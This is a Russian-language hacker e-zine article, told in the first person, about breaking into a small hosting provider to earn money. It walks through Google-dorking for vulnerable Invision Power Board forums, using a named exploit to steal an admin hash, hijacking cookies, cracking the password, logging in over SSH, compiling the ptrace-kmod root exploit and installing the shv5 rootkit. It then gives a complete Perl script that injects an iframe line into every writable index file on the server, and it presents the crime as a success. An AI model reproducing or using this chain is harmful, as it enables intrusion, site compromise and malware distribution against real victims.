|
[Интро]
Ночь. Я как обычно сижу за моим конём и пишу какой-то скрипт. Неожиданно
ко мне в асю стучится мой старый приятель и говорит
что у него большие проблемы. Всё дело в том
, что он задолжал какой-то авторитеной фирме приличное количество денег.
Не буду
называть сумму. Он попросил меня помочь ему
заработать денег. Скажу честно, что делать мне это было очень вломно,
но так,
как он был мои давним другом я решил взяться
за это тяжёлое дело и заработать денег, не только для друга, но и немного
для
себя).
[Round one,FIGHT!!!]
На тот момент, а именно в 3:47 у меня не было ни единой мысли о способе
заработки денег. Я решил пойти выпить моего любимого
соку под названием “RICH”(это не реклама),
может после него в мою голову забежит интересная мысля о том, как же
мне получить
энное количество денег. Налив кружку соку я быстро выпив её я вернулся к моему
компьютеру. В голове моей творился полный
хаус! Мозг перебирал огромное количество мыслей…И тут я вспомнил! Три дня назад
ко мне стучался один человек, который
предлагал мне работу. Я не знал всех подробностей, но помнил лишь то, что эта
работа может приносить около 200$ в день. В
моём случае это бы лучший вариант для заработка. Итак, всё, что мне оставалось
это стукнуть к этому человеку и распросить
подробности. Но на данный момент его не было в он-лайне и поэтому, я решил
оставить эту задумку на завтра, а сейчас углубит-
ься в сон …
[Round two, FIGHT!!!]
Утро. Проснувшись я быстро выпил кружку кофе и сел опять за комп.
Запускаю крысу, жму он-лайн и… Отлично тот самый чел уже
был в оне. Написав ему про то, что мне нужна
работа он с удовольствием расписал мне всё что нужно сделать. Всё было
очень
просто. Нужно было всего лишь редактировать
индекс на страницах сайтов, а точнее вставлять специальную вставку
с <iframe>.
Я знал, что это совсем не хорошо, но другого
выбора у меня не было. Дальше он сделал мне специальный аккаунт, где
я мог
просматривать статистику всех загрузок а так
же размер моего так называемого кошелька. Объяснив все остальные подробности
он удалился в офф. Теперь у меня была пища
для размышления. Итак, я сразу сказал себе что мне нужен какой-нибудь
раскрученный
портал или ещё лучше хостинг. И тут ко мне пришла мысль. А что если сломать
какой-нибудь крупный сайт на, котором стоит
бажный IPB?Тем более ребята из RST недавно написали к нему сплойт? ДА! Так
и было решено….
[Засос с гуглом]
Теперь мне нужно было всего лишь найти тот самый крупный сайт с бажным
IPB. Думаю ты уже понял что следующим моим шагом было
приятное общение с гуглом. Теперь я вбил следующий запрос: Powered by Invision
Power Board. Как обычно гугл выплюнул мне
огромное кол-во ссылок на огромное кол-во форумов, среди которых обязательно
был бажный IPB(см. скрин). Сплойт работал на
версиях 1.x - 2.x ,включая версию 2.0.4 ,поэтому бажный форум было найти очень
легко. Я не стал долго слоняться по страницам
\поисковика и сразу кликну по перовой ссылки, которая попалась мне на глаза.
Версия форума была 1.3 ,и я почти был уверен
что, форум бажный….
[В атаку!]
Я слил, нужный мне сплойт на винт (http://www.securitylab.ru/_Exploits/2005/05/r57ipb2.txt)
и начал разбираться с ним.
Набрав имя скрипта в консоли, я увидел опции,
с которыми нужно запускать сплойт. Они были очень простые. Нужно было
лишь
вписать линк на атакуемый сайт, путь к форуму
, id юзера, хэш которого мы хотим украсть и версия форума (см. крин).
Итак,
указав все параметры я начал нервно ждать результата…После
двухминутного напряга скрипт раскрыл мне хэш админа, что меня не
могло не обрадовать. Дальше я подредил мои
кукисы, прогой под названием Cookie Editor.Обновив страницу я уже был
зареган как
админ и мел доступ в админку форума. Для коллекции
я забрался в админку форума и забэкапил БД форума, сам не знаю зачем
я
это сделал) Я понимал, что админка много мне
не даст, поэтому я решил попробовать рашифровать хэш-пасс админа ,
md5Insede’om.
Я слил себе большой словарь на 3 лимона слов
и приступил у бруту. Пасс нашёлся за считанные секунды (ещё бы ;)).Зачем
мне
нужен был хэш спросишь ты меня ? Ну я тебе
отвечу … Вдруг этот пасс подойдёт к ftp , или ещё лучше к ssh? С первым
вариантом
и со вторым мне
повезло и я успешно залогонился
по ssh с логином админа и его
расшифрованным пассом…
[Final Fight]
После логинации по ssh я попал в систему. Это был старый добрый Linux
Что, ты думаешь я сделал дальше? Конечно же
проверил какая качалка стоит на сервере. Там стоял wget. Дальше я
сливаю
ptrace-kmod-сплойт,о котором ты наверное не
раз слышал много историй. Думаю, не стоит тебе напоминать ещё и о том
факте,
что сплойт работает в ядрах 2.2.х – 2.4.22
и ниже. Так же он откажется работать если на ядре лежит grsecurity
патч. Есть
ещё одна интересная фишка. Если вдруг на серваке
не стоит компилятор, к примеру gcc ,то его можно без проблем собрать
на
другой тачке. В моём случае компилятор присутствовал
на машине и мне оставалось лишь скомпилить и собрать сплойт, что я
и
сделал. Сначала я вбил команду gcc ptrace-kmod.c
–o ptrace.Этой командой я скомпилил сплойт, далее. Дальше вбил ./ptrace
и ….
УРА! Сплойт удачно сработал и выдал мне как
на блюдечке рутовые права! Я сразу же слил руткит под названием shv5
и
залогинился под ним, соблюдая безопасность))
Дальше я полез в корень системы и проверил всё что там было. Это был
хостинг.
Хоть и мелкий, но хостинг! Дальше было решено
составить perl-скрипт, который добавляет в индексы все сайтов хостящихся
на
сервере, нужную мне строку. Вот сорец:
#!/usr/bin/perl -w
#
use strict;
my $dir=$ARGV[0] || $ENV{'HOME'}; # откуда пойдем плясать
my $idx_ext='index'; #что ищем
my $shit="ТУТ Я ВСТАВИЛ НУЖНУЮ МНЕ СТРОКУ";
my @INDEX=();# массив для файлов
&recur($dir);
my @RWF=&test();# проверяем файлы доступные для записи
foreach (@RWF) {
print "Rewrite file $_";
open(HACK,">>",$_) || die "$!\n";
print HACK $shit;
close(HACK);
print "..................OK\n";
}
############ SubRoutines ###########################
sub recur
{
my $dir = shift;
opendir DIR, $dir or return;
my @contents = map "$dir/$_", sort grep !/^\.\.?$/, readdir DIR;
closedir DIR;
foreach (@contents)
{
if (!-l && -d)
{
recur($_);
} else {
if ($_ =~ /$idx_ext\.\w+$/i)
{
push(@INDEX,$_);
} else { next; }
}
}
}
sub test {
my @RWF=();
while(@INDEX) {
my $file=shift(@INDEX);
push(@RWF,$file) if(-w $file);
}
return @RWF;
}
Дальше я залил его корень и запустил, через 15 минут (может и меньше)
на сайтах хостинга в индексах была прописана строка
которая в дальнейшем приносила мне по 150$
, а иногда и 200$ в день. Через неделю друг отдал долг той злой фирме
и мы с ним
сидели в баре и пили пиво смотря на проходящих
вокруг тёлок.
[The End]
Вообщем мораль сего. Нужно помнить, что друзья
занимают одну из важных ступеней вашей жизни и если ты не уважаешь
друзей или
просто не хочешь, им помогать, то думаю в скорости
ты их потеряешь и будешь сидеть как та бабка у разбитого корыта ….
////////// uD4ch1 !!! ////////
P.S
Хочу сказать огромное спасибо Poizon'u, $t4lker'u, Said'u всем ребятам,
которые трудятся над этим и-зином , тратят своё время,
не спят ночами, и
пытаются сделать его лучше и удобнее!
--
Так же выделяю огромный респект всем мемберам моей
тимы (Ru24-team),а
именно: Nitrex, Dreamerz, Dokk21, Shados,ro0sty,
Gadfly.
----
Конечно же мир таким тимам как : Cyberlords и RST.
Спасибо ребята , что
вы есть и радуете нас всех вашими работами и многим
другим.
--
Ну и напоследок хочу передать приветы моим друзьям
:
---
Naikon (Я думаю мы никогда не перестанем с тобой
сраться и посылать друг-друга на Х** ) :))
Nicatin - мы ещё с тобой встретимся ;)
Ta!os - удачи тебе в твоих дизайн-продвижениях, у
тебя замечательные работы ;)
|
